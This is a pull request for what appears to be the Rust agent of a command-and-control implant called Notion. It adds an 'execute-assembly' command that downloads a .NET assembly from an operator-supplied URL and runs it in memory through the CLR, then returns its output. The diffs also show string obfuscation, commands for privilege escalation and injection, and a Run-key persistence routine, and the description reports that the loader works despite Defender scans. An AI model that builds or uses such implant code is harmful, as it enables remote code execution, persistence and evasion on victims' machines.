### PR TITLE
Execute-Assembly

### DIFF
--- a/agent/Cargo.lock
+++ b/agent/Cargo.lock
@@ -500,6 +500,15 @@ dependencies = [
 ]
 
 [[package]]
+name = "clroxide"
+version = "1.0.9"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "9174be4cab14953c231dd67a08ac842a5cc555783933b2e94735d5e187862ef7"
+dependencies = [
+ "windows 0.46.0",
+]
+
+[[package]]
 name = "concurrent-queue"
 version = "2.1.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -1348,6 +1357,7 @@ dependencies = [
  "azure_storage_blobs",
  "base64 0.13.1",
  "cidr-utils",
+ "clroxide",
  "embed-resource",
  "encoding",
  "houdini",
@@ -1362,7 +1372,7 @@ dependencies = [
  "sysinfo",
  "tokio",
  "whoami",
- "windows",
+ "windows 0.34.0",
  "winreg",
 ]
 
@@ -2455,18 +2465,27 @@ dependencies = [
 ]
 
 [[package]]
+name = "windows"
+version = "0.46.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "cdacb41e6a96a052c6cb63a144f24900236121c6f63f4f8219fef5977ecb0c25"
+dependencies = [
+ "windows-targets",
+]
+
+[[package]]
 name = "windows-sys"
 version = "0.42.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "5a3e1820f08b8513f676f7ab6c1f99ff312fb97b553d30ff4dd86f9f15728aa7"
 dependencies = [
  "windows_aarch64_gnullvm",
- "windows_aarch64_msvc 0.42.1",
- "windows_i686_gnu 0.42.1",
- "windows_i686_msvc 0.42.1",
- "windows_x86_64_gnu 0.42.1",
+ "windows_aarch64_msvc 0.42.2",
+ "windows_i686_gnu 0.42.2",
+ "windows_i686_msvc 0.42.2",
+ "windows_x86_64_gnu 0.42.2",
  "windows_x86_64_gnullvm",
- "windows_x86_64_msvc 0.42.1",
+ "windows_x86_64_msvc 0.42.2",
 ]
 
 [[package]]
@@ -2480,24 +2499,24 @@ dependencies = [
 
 [[package]]
 name = "windows-targets"
-version = "0.42.1"
+version = "0.42.2"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "8e2522491fbfcd58cc84d47aeb2958948c4b8982e9a2d8a2a35bbaed431390e7"
+checksum = "8e5180c00cd44c9b1c88adb3693291f1cd93605ded80c250a75d472756b4d071"
 dependencies = [
  "windows_aarch64_gnullvm",
- "windows_aarch64_msvc 0.42.1",
- "windows_i686_gnu 0.42.1",
- "windows_i686_msvc 0.42.1",
- "windows_x86_64_gnu 0.42.1",
+ "windows_aarch64_msvc 0.42.2",
+ "windows_i686_gnu 0.42.2",
+ "windows_i686_msvc 0.42.2",
+ "windows_x86_64_gnu 0.42.2",
  "windows_x86_64_gnullvm",
- "windows_x86_64_msvc 0.42.1",
+ "windows_x86_64_msvc 0.42.2",
 ]
 
 [[package]]
 name = "windows_aarch64_gnullvm"
-version = "0.42.1"
+version = "0.42.2"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "8c9864e83243fdec7fc9c5444389dcbbfd258f745e7853198f365e3c4968a608"
+checksum = "597a5118570b68bc08d8d59125332c54f1ba9d9adeedeef5b99b02ba2b0698f8"
 
 [[package]]
 name = "windows_aarch64_msvc"
@@ -2507,9 +2526,9 @@ checksum = "17cffbe740121affb56fad0fc0e421804adf0ae00891205213b5cecd30db881d"
 
 [[package]]
 name = "windows_aarch64_msvc"
-version = "0.42.1"
+version = "0.42.2"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "4c8b1b673ffc16c47a9ff48570a9d85e25d265735c503681332589af6253c6c7"
+checksum = "e08e8864a60f06ef0d0ff4ba04124db8b0fb3be5776a5cd47641e942e58c4d43"
 
 [[package]]
 name = "windows_i686_gnu"
@@ -2519,9 +2538,9 @@ checksum = "2564fde759adb79129d9b4f54be42b32c89970c18ebf93124ca8870a498688ed"
 
 [[package]]
 name = "windows_i686_gnu"
-version = "0.42.1"
+version = "0.42.2"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "de3887528ad530ba7bdbb1faa8275ec7a1155a45ffa57c37993960277145d640"
+checksum = "c61d927d8da41da96a81f029489353e68739737d3beca43145c8afec9a31a84f"
 
 [[package]]
 name = "windows_i686_msvc"
@@ -2531,9 +2550,9 @@ checksum = "9cd9d32ba70453522332c14d38814bceeb747d80b3958676007acadd7e166956"
 
 [[package]]
 name = "windows_i686_msvc"
-version = "0.42.1"
+version = "0.42.2"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "bf4d1122317eddd6ff351aa852118a2418ad4214e6613a50e0191f7004372605"
+checksum = "44d840b6ec649f480a41c8d80f9c65108b92d89345dd94027bfe06ac444d1060"
 
 [[package]]
 name = "windows_x86_64_gnu"
@@ -2543,15 +2562,15 @@ checksum = "cfce6deae227ee8d356d19effc141a509cc503dfd1f850622ec4b0f84428e1f4"
 
 [[package]]
 name = "windows_x86_64_gnu"
-version = "0.42.1"
+version = "0.42.2"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "c1040f221285e17ebccbc2591ffdc2d44ee1f9186324dd3e84e99ac68d699c45"
+checksum = "8de912b8b8feb55c064867cf047dda097f92d51efad5b491dfb98f6bbb70cb36"
 
 [[package]]
 name = "windows_x86_64_gnullvm"
-version = "0.42.1"
+version = "0.42.2"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "628bfdf232daa22b0d64fdb62b09fcc36bb01f05a3939e20ab73aaf9470d0463"
+checksum = "26d41b46a36d453748aedef1486d5c7a85db22e56aff34643984ea85514e94a3"
 
 [[package]]
 name = "windows_x86_64_msvc"
@@ -2561,9 +2580,9 @@ checksum = "d19538ccc21819d01deaf88d6a17eae6596a12e9aafdbb97916fb49896d89de9"
 
 [[package]]
 name = "windows_x86_64_msvc"
-version = "0.42.1"
+version = "0.42.2"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "447660ad36a13288b1db4d4248e857b510e8c3a225c822ba4fb748c0aafecffd"
+checksum = "9aec5da331524158c6d1a4ac0ab1541149c0b9505fde06423b02f5ef0106b9f0"
 
 [[package]]
 name = "winreg"

--- a/agent/Cargo.lock
+++ b/agent/Cargo.lock
@@ -501,9 +501,9 @@ dependencies = [
 
 [[package]]
 name = "clroxide"
-version = "1.0.9"
+version = "1.1.1"
 source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "9174be4cab14953c231dd67a08ac842a5cc555783933b2e94735d5e187862ef7"
+checksum = "281a172ac3da6f4bed28fa7078c514d348f04d0540288dd79d2854c9a60b4ef3"
 dependencies = [
  "windows 0.46.0",
 ]

--- a/agent/Cargo.toml
+++ b/agent/Cargo.toml
@@ -28,7 +28,7 @@ aws-types = "0.46.0"
 azure_storage = "0.5.0"
 azure_storage_blobs = "0.5.0"
 regex = "1.5.5"
-clroxide = { version = "1.0.9", features = ["default", "default-loader"] }
+clroxide = { version = "1.1.1", features = ["default", "default-loader"] }
 
 [build-dependencies]
 embed-resource = "1.6"

--- a/agent/Cargo.toml
+++ b/agent/Cargo.toml
@@ -28,6 +28,7 @@ aws-types = "0.46.0"
 azure_storage = "0.5.0"
 azure_storage_blobs = "0.5.0"
 regex = "1.5.5"
+clroxide = { version = "1.0.9", features = ["default", "default-loader"] }
 
 [build-dependencies]
 embed-resource = "1.6"

--- a/agent/src/cmd/execute_assembly.rs
+++ b/agent/src/cmd/execute_assembly.rs
@@ -2,21 +2,13 @@ use std::error::Error;
 use litcrypt::lc;
 use crate::cmd::{CommandArgs, notion_out};
 use crate::logger::{Logger, log_out};
-use clroxide::{
-    clr::{Clr, ClrContext},
-    primitives::{
-        ICLRMetaHost,
-        GUID,
-        HRESULT
-    }
-};
-use std::ffi::c_void;
-use std::mem::transmute;
-use reqwest::{get, StatusCode};
+#[cfg(windows)] use clroxide::clr::Clr;
+#[cfg(windows)] use reqwest::{get, StatusCode};
 
 ///
 /// Executes .NET assembly in memory given a URL to the assembly and a set of arguments
 /// 
+#[cfg(windows)]
 pub async fn handle(cmd_args: &mut CommandArgs, logger: &Logger)-> Result<String, Box<dyn Error>> {
     
     // Parse args
@@ -38,8 +30,7 @@ pub async fn handle(cmd_args: &mut CommandArgs, logger: &Logger)-> Result<String
                             // Return Output
                             logger.debug(log_out!("CLR Created"));
                             let res: String = clr.run().unwrap();
-                            dbg!("{:?}", res);
-                            return notion_out!(res);
+                            return Ok(res);
                         }
                     }
                 } else {
@@ -57,4 +48,9 @@ pub async fn handle(cmd_args: &mut CommandArgs, logger: &Logger)-> Result<String
     }
 
     notion_out!("Assembly Executed!")
+}
+
+#[cfg(not(windows))]
+pub async fn handle(_cmd_args: &mut CommandArgs, _logger: &Logger)-> Result<String, Box<dyn Error>> {
+    notion_out!("Only available on Windows!")
 }

--- a/agent/src/cmd/execute_assembly.rs
+++ b/agent/src/cmd/execute_assembly.rs
@@ -1,0 +1,33 @@
+use std::error::Error;
+use litcrypt::lc;
+use crate::cmd::{CommandArgs, notion_out};
+use crate::logger::{Logger, log_out};
+
+use std::fs;
+use std::path::{Path, PathBuf};
+
+pub async fn handle(cmd_args: &mut CommandArgs, logger: &Logger)-> Result<String, Box<dyn Error>> {
+    
+    let file_vector: Vec<String> = std::fs::read_dir(".").unwrap() 
+        .filter_map(|maybe_dir_entry| {
+            let dir_entry = maybe_dir_entry.ok()?;
+            let path_buf = dir_entry.path();
+            let file_name = path_buf.file_name()?;
+            let string = file_name.to_str()?; 
+            Some(string.to_string())
+        })
+        .collect();
+
+        let mut return_string: String = "".to_string();
+
+        for file_name in file_vector {
+            return_string.push_str(&file_name);
+            return_string.push_str("\n");
+        }
+
+        if return_string.is_empty() {
+            Ok(lc!("[*] Directory is empty"))
+        } else {
+            Ok(return_string)
+        }
+}

--- a/agent/src/cmd/execute_assembly.rs
+++ b/agent/src/cmd/execute_assembly.rs
@@ -2,32 +2,59 @@ use std::error::Error;
 use litcrypt::lc;
 use crate::cmd::{CommandArgs, notion_out};
 use crate::logger::{Logger, log_out};
+use clroxide::{
+    clr::{Clr, ClrContext},
+    primitives::{
+        ICLRMetaHost,
+        GUID,
+        HRESULT
+    }
+};
+use std::ffi::c_void;
+use std::mem::transmute;
+use reqwest::{get, StatusCode};
 
-use std::fs;
-use std::path::{Path, PathBuf};
-
+///
+/// Executes .NET assembly in memory given a URL to the assembly and a set of arguments
+/// 
 pub async fn handle(cmd_args: &mut CommandArgs, logger: &Logger)-> Result<String, Box<dyn Error>> {
     
-    let file_vector: Vec<String> = std::fs::read_dir(".").unwrap() 
-        .filter_map(|maybe_dir_entry| {
-            let dir_entry = maybe_dir_entry.ok()?;
-            let path_buf = dir_entry.path();
-            let file_name = path_buf.file_name()?;
-            let string = file_name.to_str()?; 
-            Some(string.to_string())
-        })
-        .collect();
+    // Parse args
+    // Check URL
+    if let Some(url) = cmd_args.nth(0) {
+        logger.debug(log_out!("Fetching Assembly at ", &url));
+        // Fetch Assembly
+        match get(&url).await {            
+            Ok(r) => {
+                if r.status() == StatusCode::OK {
+                    logger.debug(log_out!("Assembly retrieved"));
+                    if let Ok(assembly) = r.bytes().await {
+                        let assembly_args: Vec<String> = cmd_args.collect();
+                        // Instantiate CLR
 
-        let mut return_string: String = "".to_string();
-
-        for file_name in file_vector {
-            return_string.push_str(&file_name);
-            return_string.push_str("\n");
+                        if let Ok(mut clr) = Clr::new(assembly.to_vec(), assembly_args) {
+                            // Get clr context
+                            // Run Assembly
+                            // Return Output
+                            logger.debug(log_out!("CLR Created"));
+                            let res: String = clr.run().unwrap();
+                            dbg!("{:?}", res);
+                            return notion_out!(res);
+                        }
+                    }
+                } else {
+                    let status_code = r.status();
+                    return notion_out!("Could not download: HTTP ", status_code.as_str());
+                }
+            },
+            Err(_) => {
+                return notion_out!("Could not request", &url);
+            }
         }
 
-        if return_string.is_empty() {
-            Ok(lc!("[*] Directory is empty"))
-        } else {
-            Ok(return_string)
-        }
+    } else {
+        return notion_out!("No URL provided!")
+    }
+
+    notion_out!("Assembly Executed!")
 }

--- a/agent/src/cmd/mod.rs
+++ b/agent/src/cmd/mod.rs
@@ -13,6 +13,7 @@ mod cd;
 mod config;
 mod download;
 pub mod elevate;
+mod execute_assembly;
 pub mod getprivs;
 mod getsystem;
 mod inject;
@@ -57,6 +58,7 @@ pub enum CommandType {
     Config,
     Download,
     Elevate,
+    ExecuteAssembly,
     Getprivs,
     Getsystem,
     Inject,
@@ -184,6 +186,7 @@ impl NotionCommand {
                 "config"       => CommandType::Config,
                 "download"     => CommandType::Download,
                 "elevate"      => CommandType::Elevate,
+                "execute-assembly" => CommandType::ExecuteAssembly,
                 "getprivs"     => CommandType::Getprivs,
                 "getsystem"    => CommandType::Getsystem,
                 "inject"       => CommandType::Inject,
@@ -216,6 +219,7 @@ impl NotionCommand {
             CommandType::Cd           => cd::handle(&mut self.args),
             CommandType::Config       => config::handle(&mut self.args, config_options, logger).await,
             CommandType::Download     => download::handle( &mut self.args, logger).await,
+            CommandType::ExecuteAssembly => execute_assembly::handle(&mut self.args, logger).await,
             CommandType::Elevate      => elevate::handle(&mut self.args, config_options).await,
             CommandType::Getprivs     => getprivs::handle().await,
             CommandType::Getsystem    => getsystem::handle(logger).await,

--- a/agent/src/cmd/persist.rs
+++ b/agent/src/cmd/persist.rs
@@ -5,7 +5,7 @@ use is_root::is_root;
 use crate::cmd::{CommandArgs, shell, save, notion_out};
 #[cfg(not(windows))] use std::fs::{create_dir, copy, write};
 #[cfg(windows)] use std::path::Path;
-#[cfg(windows)] use winreg::{RegKey};
+#[cfg(windows)] use winreg::{RegKey, enums::RegDisposition};
 #[cfg(windows)] use std::fs::copy as fs_copy;
 #[cfg(windows)] use winreg::enums::HKEY_CURRENT_USER;
 #[cfg(windows)] use std::process::Command;
@@ -58,8 +58,8 @@ pub async fn handle(cmd_args: &mut CommandArgs, config_options: &mut ConfigOptio
                     let path = Path::new(r"Software\Microsoft\Windows\CurrentVersion\Run");
                     let (key, disp) = hkcu.create_subkey(&path)?;
                     match disp {
-                        REG_CREATED_NEW_KEY => logger.info(log_out!("A new key has been created")),
-                        REG_OPENED_EXISTING_KEY => logger.info(log_out!("An existing key has been opened")),
+                        RegDisposition::REG_CREATED_NEW_KEY => logger.info(log_out!("A new key has been created")),
+                        RegDisposition::REG_OPENED_EXISTING_KEY => logger.info(log_out!("An existing key has been opened")),
                     };
                     key.set_value("Notion", &persist_path)?;
                     notion_out!("Persistence accomplished")


### PR DESCRIPTION
Working `execute-assembly`. Although the assemblies are still subject to examination on download by Defender, this runs and returns the output successfully!